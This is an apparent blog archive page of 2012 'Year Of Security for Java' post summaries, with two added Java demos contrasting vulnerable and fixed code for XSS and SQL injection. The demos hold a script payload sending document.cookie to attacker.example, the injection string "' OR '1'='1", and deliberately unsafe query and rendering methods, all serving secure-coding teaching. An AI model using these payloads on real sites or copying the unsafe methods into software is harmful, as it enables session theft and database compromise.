
John Melton's Weblog

Java, Security and Technology


Author: john

Year Of Security for Java – Week 45 – Do Threat Modeling

What is it and why should I care? After the last post covering the concept of a secure SDLC, this week we’ll look at a specific activity recommended by the various secure SDLC models: threat modeling. From the view of the secure SDLC, this is an activity that takes place fairly early in […]

2012/11/09 | john | 3 Comments

Year Of Security for Java – Week 44 – Follow a Secure SDLC

What is it and why should I care? Software development has taken an interesting path over the short lifetime of the field. It began as a deeply technical field where only the best and brightest could participate, which is not unusual since it was born out of engineering, a very technical and structured field […]

2012/11/03 | john | 1 Comment

Year Of Security for Java – Week 43 – Build Something (and Give It Away)

What is it and why should I care? This will admittedly be a short post because it’s a pretty simple concept. Here’s the simple idea in bullet form:

  • Developers are builders of software (and security systems and even documentation sometimes)
  • There is a need for software & docs
  • Developers build software […]

2012/10/27 | john | No Comments

Year Of Security for Java – Week 42 – Break Something

What is it and why should I care? Breaking something (legally, of course) is one of the best ways to learn how it works. Software is no different. Breaking software is sometimes trivial and sometimes extremely complex, but either way is a great exercise. In particular for developers, it forces you out of the […]

2012/10/19 | john | 1 Comment

Year Of Security for Java – Week 41 – Spend (Wisely) on Developer Security Training

What is it and why should I care? In the last post, I gave some justifications for getting security people into your organization, as well as reasons to have them closely knitted into your team. In this post, I’d like to move the attention to the developers already on your team. Let’s say you’ve […]

2012/10/12 | john | No Comments

Year Of Security for Java – Week 40 – Get a Security Person (or Some People) if You Can

What is it and why should I care? I spend a good bit of time talking about both development and security. I spend a lot of time working with other developers and other security people. There are a precious few that I know of that excel at both development and security. This is a […]

2012/10/05 | john | 1 Comment

Year Of Security for Java – Week 39 – Don’t Reinvent the Wheel (Unless It’s Square)

What is it and why should I care? This is a bit of a follow-up to my last post with a bit of a different viewpoint. In that post, I specifically looked at code reuse from the perspective of creating an internal framework to centralize code related to security functionality. This week, I want […]

2012/09/27 | john | No Comments

Year Of Security for Java – Week 38 – Create A Reusable Security Framework

What is it and why should I care? Software reuse is a ubiquitous practice in software development. One study says that “80% of the code in today’s applications comes from libraries and frameworks”. That’s a lot. There is already a lot of research about software reuse and its benefits. While the research exists, there’s […]

2012/09/21 | john | 1 Comment

Year Of Security for Java – Week 37 – Solve Cross-Site Scripting

What is it and why should I care? Cross-Site Scripting (XSS) is another issue that is caused because of poor code/data separation. The general issue is that a developer intends the user input to be interpreted as data, but an attacker can manipulate the input to cause the browser to interpret the input as […]

2012/09/12 | john | No Comments
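The code/data confusion the Week 37 excerpt describes, as an added Java example that is not code from the original post: the same user-supplied "display name" is pasted into HTML once raw, so the browser parses the markup in it as code, and once after output encoding for the HTML text context, so it can only ever be data. The encoder is hand-written here purely so the example runs without dependencies; in real code use a maintained library such as the OWASP Java Encoder, and pick the encoder for the context you are writing into (HTML text, attribute, JavaScript, URL), since this one only covers HTML text and quoted attribute values. The class name, method names and the attacker.example host are illustrative assumptions.

```java
/**
 * Added example (not from the original post). Contrasts raw interpolation
 * of user input into HTML (XSS) with contextual output encoding. The
 * encoder below is a minimal stand-in for a real library encoder and
 * covers only the HTML text and quoted-attribute contexts.
 */
public class XssDemo {

    // Vulnerable: the input is concatenated straight into the markup, so
    // any tags or script the attacker includes are parsed by the browser.
    static String renderUnsafe(String displayName) {
        return "<p>Hello, " + displayName + "!</p>";
    }

    // Hardened: the input is encoded for the HTML text context first, so
    // the browser renders it as literal characters.
    static String renderSafe(String displayName) {
        return "<p>Hello, " + encodeForHtml(displayName) + "!</p>";
    }

    // Replaces the characters that can close or start an HTML text node,
    // tag, or quoted attribute value with their entity forms.
    static String encodeForHtml(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#x27;"); break;
                case '/':  sb.append("&#x2F;"); break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        // Constructed attacker input: submitted as a "name", but carries a
        // script that exfiltrates the session cookie to a hypothetical host.
        String payload = "<script>document.location='http://attacker.example/?c='"
                       + "+document.cookie</script>";
        System.out.println("unsafe: " + renderUnsafe(payload));
        System.out.println("safe:   " + renderSafe(payload));
    }
}
```

Run it with `javac XssDemo.java && java XssDemo`: the first line of output contains a live `<script>` element, the second contains only `&lt;script&gt;...` text that the browser will display rather than execute.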

Year Of Security for Java – Week 36 – Solve SQL Injection

What is it and why should I care? SQL Injection (SQLi) is an issue that is caused because of poor code/data separation. The general issue is that a developer intends the user input to be interpreted as data, but an attacker can manipulate the input to cause the database to interpret the input as […]

2012/09/07 | john | 1 Comment
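The same code/data confusion on the database side, as an added JDBC example that is not code from the original post: one lookup builds the SQL text from the username, so a crafted value rewrites the query the database parses; the other fixes the SQL text and binds the value as a parameter, so whatever the user sends is compared as a string literal and never parsed as SQL. The `users` table, its columns, the class and method names are illustrative assumptions; the two `userExists*` methods expect a `java.sql.Connection` that you supply, while `main` only shows the query text the unsafe path would send.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

/**
 * Added example (not from the original post). Contrasts string-built SQL,
 * where the database parses attacker input as SQL code, with a
 * PreparedStatement, where the input is bound as a parameter and can only
 * ever be data. Table and column names are assumptions.
 */
public class SqliDemo {

    // Vulnerable: the query text itself is assembled from user input, so a
    // quote in the input ends the literal and the rest becomes SQL.
    static String buildUnsafeQuery(String username) {
        return "SELECT id, username FROM users WHERE username = '" + username + "'";
    }

    static boolean userExistsUnsafe(Connection conn, String username) throws SQLException {
        try (Statement st = conn.createStatement();
             ResultSet rs = st.executeQuery(buildUnsafeQuery(username))) {
            return rs.next();
        }
    }

    // Hardened: the SQL text is constant; the value is sent to the driver as
    // a bound parameter and is compared as a string, never parsed.
    static boolean userExistsSafe(Connection conn, String username) throws SQLException {
        String sql = "SELECT id, username FROM users WHERE username = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, username);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next();
            }
        }
    }

    public static void main(String[] args) {
        // Constructed attacker input: closes the string literal and appends a
        // tautology, so the unsafe query's WHERE clause matches every row.
        String payload = "' OR '1'='1";
        System.out.println(buildUnsafeQuery(payload));
        // userExistsSafe(conn, payload) would instead search for a user whose
        // name is literally the string ' OR '1'='1 and return false.
    }
}
```

Note that the parameter binding is what fixes the problem, not escaping: identifiers, ORDER BY columns and other non-value positions cannot be bound with `?`, so for those the input must be validated against an allow-list rather than concatenated.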

